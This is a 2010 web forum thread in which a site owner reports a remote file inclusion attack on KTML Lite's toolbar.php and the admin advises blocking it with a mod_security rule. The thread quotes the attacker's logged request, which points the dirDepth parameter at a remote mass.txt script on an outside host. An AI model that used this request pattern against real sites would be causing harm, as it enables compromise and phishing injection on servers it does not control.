toolbar.php and index.php dirDepth - hostile injection

glensbo
Posts: 6
Joined: 2010-07-15 17:03

toolbar.php and index.php dirDepth - hostile injection

Post by glensbo » 2010-07-15 17:11

Have any of you seen any solution to this problem:
THe problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if youa are able to place phishing code via the two files in ktml
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html

Could anybody help in finding ways around this securityproblem?
Regards Henri

User avatar
Fred
Site Admin
Posts: 491
Joined: 2010-02-15 12:10
Location: Armagh, Northern Ireland
Contact:

Re: toolbar.php and index.php dirDepth - hostile injection

Post by Fred » 2010-07-16 20:38

Hi Henri,
Havn't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens.
I am sure (might be totally wrong) that the toolbar.php file will never be used with a http parameter so it should be easy enough to check for such an event.
If it is used with a http parameter, you can check that the domain is the same as where the script is running from. You will definetaly not include a file from a remote domain in that manner.

Coding mod_sec rules are not my forte so it will be best to ask your host for assistance.

glensbo
Posts: 6
Joined: 2010-07-15 17:03

Re: toolbar.php and index.php dirDepth - hostile injection

Post by glensbo » 2010-07-24 15:45

Thanks for your reply. I will delete the two files, and see if i has any effect.

User avatar
Fred
Site Admin
Posts: 491
Joined: 2010-02-15 12:10
Location: Armagh, Northern Ireland
Contact:

Re: toolbar.php and index.php dirDepth - hostile injection

Post by Fred » 2010-07-26 17:28

What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.

glensbo
Posts: 6
Joined: 2010-07-15 17:03

Re: toolbar.php and index.php dirDepth - hostile injection

Post by glensbo » 2010-08-27 10:36

Fred wrote:What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
Thank for your help as it was what I experienced, so I will write the workaround as you have outlined. Thanks again

User avatar
Fred
Site Admin
Posts: 491
Joined: 2010-02-15 12:10
Location: Armagh, Northern Ireland
Contact:

Re: toolbar.php and index.php dirDepth - hostile injection

Post by Fred » 2010-08-27 11:17

Glad you solved your problem.

Could you post the rule that you created.
It might be useful for someone else as well

Post Reply